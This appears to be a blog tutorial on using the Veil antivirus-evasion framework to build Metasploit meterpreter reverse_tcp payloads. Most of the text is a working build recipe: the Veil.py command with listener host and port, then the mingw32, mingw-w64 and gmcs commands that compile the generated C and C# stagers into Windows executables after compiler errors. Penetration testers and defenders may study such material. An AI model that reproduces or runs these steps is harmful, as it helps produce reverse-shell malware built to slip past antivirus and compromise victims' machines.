As you know, Veil is an AV evasion framework for Metasploit payloads. On the 15th of every month, for the next year, at least one new payload module will be released. Yesterday they released two new payloads.
- pure windows/meterpreter/reverse_tcp stager, no shellcode
- pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode
Compiler error in C payloads:-
Available c payloads:
VirtualAlloc Poor
VoidPointer Poor
meter_rev_tcp Excellent
meter_rev_tcp_service Excellent
I used c/meter_rev_tcp. After setting LHOST & LPORT, when I tried to generate it, I got an error.
sh: i686-w64-mingw32-gcc: command not found
sh: i686-w64-mingw32-gcc: command not found
Okay, now we have successfully generated the payload file, but we get a compiler error while compiling it into a cross-platform exe.
The error clearly indicates that i686-w64-mingw32-gcc is not installed. The mingw-w64 project is a complete run-time environment for gcc to support binaries native to Windows 64-bit and 32-bit operating systems. In short, to compile the payload for 64-bit Windows, we have to install mingw-w64.
In the case of 32-bit Windows, we can compile it, because mingw32 is installed under wine when you set up the Veil environment.
Compile payload for 32 bit:-
root@bt:~# cd .wine/drive_c/MinGW/bin/
root@bt:~/.wine/drive_c/MinGW/bin# wine mingw32-gcc.exe /root/veil-output/source/output.c -lwsock32 -o output.exe
So our payload is compiled into an exe for 32-bit Windows.
Compile payload for 64 bit:-
For this purpose you have to install mingw-w64.
Download it from here and build it. If you don't want to install it, you can use a pre-compiled version.
root@bt:/media/tools/mingw-w64-bin_i686-linux_20111031_sezero/cross_win64/bin# ./x86_64-w64-mingw32-gcc /root/veil-output/source/output.c -lwsock32 -o output.exe
I didn't test the compiled exe on 64-bit, so if anyone uses it, please let me know whether the exe works or not.
If you want to build MinGW-w64 for Win32 and Win64 using an automated bash script, click here.
Compiler error in C#:-
Available c# payloads:
VirtualAlloc Poor
b64SubVirtualAlloc Normal
root@bt:~/Downloads/Veil-master# ./Veil.py -l c# -p b64SubVirtualAlloc --msfpayload windows/meterpreter/reverse_tcp -o payload --msfoptions LHOST=192.168.56.101 LPORT=443
Our source file was generated, but we got the following error.
error CS2007: Unrecognized command-line option: `-platform:x86'
The generated source can be compiled manually with gmcs:
gmcs /root/veil-output/source/payload.cs
Now our exe is generated; it's in the same source folder.